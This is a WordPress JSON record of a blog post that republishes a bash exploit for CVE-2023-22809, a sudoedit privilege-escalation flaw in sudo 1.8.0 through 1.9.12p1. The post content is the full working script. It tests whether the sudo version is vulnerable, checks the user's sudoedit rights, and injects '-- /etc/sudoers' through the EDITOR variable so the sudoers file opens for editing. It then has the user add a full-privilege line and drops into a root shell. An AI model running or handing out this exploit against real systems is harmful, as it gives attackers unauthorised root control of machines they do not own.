{"id":39908,"date":"2023-04-03T23:49:06","date_gmt":"2023-04-03T19:49:06","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171644\/sudo1912p1-escalate.txt"},"modified":"2023-04-10T13:22:54","modified_gmt":"2023-04-10T08:52:54","slug":"sudo-1-9-12p1-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/sudo-1-9-12p1-privilege-escalation\/","title":{"rendered":"sudo 1.9.12p1 Privilege Escalation"},"content":{"rendered":"<p>#!\/usr\/bin\/env bash<\/p>\n<p># Exploit Title: sudo 1.8.0 to 1.9.12p1 &#8211; Privilege Escalation<br \/>\n# Exploit Author: n3m1.sys<br \/>\n# CVE: CVE-2023-22809<br \/>\n# Date: 2023\/01\/21<br \/>\n# Vendor Homepage: https:\/\/www.sudo.ws\/<br \/>\n# Software Link: https:\/\/www.sudo.ws\/dist\/sudo-1.9.12p1.tar.gz<br \/>\n# Version: 1.8.0 to 1.9.12p1<br \/>\n# Tested on: Ubuntu Server 22.04 &#8211; vim 8.2.4919 &#8211; sudo 1.9.9<br \/>\n#<br \/>\n# Git repository: https:\/\/github.com\/n3m1dotsys\/CVE-2023-22809-sudoedit-privesc<br \/>\n#<br \/>\n# Running this exploit on a vulnerable system allows a localiattacker to gain<br \/>\n# a root shell on the machine.<br \/>\n#<br \/>\n# The exploit checks if the current user has privileges to run sudoedit or<br \/>\n# sudo -e on a file as root. If so it will open the sudoers file for the<br \/>\n# attacker to add a line to gain privileges on all the files and get a root<br \/>\n# shell.<\/p>\n<p>if ! sudo &#8211;version | head -1 | grep -qE &#8216;(1\\.8.*|1\\.9\\.[0-9]1?(p[1-3])?|1\\.9\\.12p1)$&#8217;<br \/>\nthen<br \/>\necho &#8220;&gt; Currently installed sudo version is not vulnerable&#8221;<br \/>\nexit 1<br \/>\nfi<\/p>\n<p>EXPLOITABLE=$(sudo -l | grep -E &#8220;sudoedit|sudo -e&#8221; | grep -E &#8216;\\(root\\)|\\(ALL\\)|\\(ALL : ALL\\)&#8217; | cut -d &#8216;)&#8217; -f 2-)<\/p>\n<p>if [ -z &#8220;$EXPLOITABLE&#8221; ]; then<br \/>\necho &#8220;&gt; It doesn&#8217;t seem that this user can run sudoedit as root&#8221;<br \/>\nread -p &#8220;Do you want to proceed anyway? (y\/N): &#8221; confirm &amp;&amp; [[ $confirm == [yY] ]] || exit 2<br \/>\nelse<br \/>\necho &#8220;&gt; BINGO! User exploitable&#8221;<br \/>\necho &#8220;&gt; Opening sudoers file, please add the following line to the file in order to do the privesc:&#8221;<br \/>\necho &#8220;$( whoami ) ALL=(ALL:ALL) ALL&#8221;<br \/>\nread -n 1 -s -r -p &#8220;Press any key to continue&#8230;&#8221;<br \/>\nEDITOR=&#8221;vim &#8212; \/etc\/sudoers&#8221; $EXPLOITABLE<br \/>\nsudo su root<br \/>\nexit 0<br \/>\nfi<\/p>\n","protected":false},"excerpt":{"rendered":"<p>#!\/usr\/bin\/env bash # Exploit Title: sudo 1.8.0 to 1.9.12p1 &#8211; Privilege Escalation # Exploit Author: n3m1.sys # CVE: CVE-2023-22809 # Date: 2023\/01\/21 # Vendor Homepage: https:\/\/www.sudo.ws\/ # Software Link: https:\/\/www.sudo.ws\/dist\/sudo-1.9.12p1.tar.gz # Version: 1.8.0 to 1.9.12p1 # Tested on: Ubuntu Server 22.04 &#8211; vim 8.2.4919 &#8211; sudo 1.9.9 # # Git repository: https:\/\/github.com\/n3m1dotsys\/CVE-2023-22809-sudoedit-privesc # # Running &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-39908","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39908","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=39908"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39908\/revisions"}],"predecessor-version":[{"id":40203,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39908\/revisions\/40203"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=39908"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=39908"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=39908"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}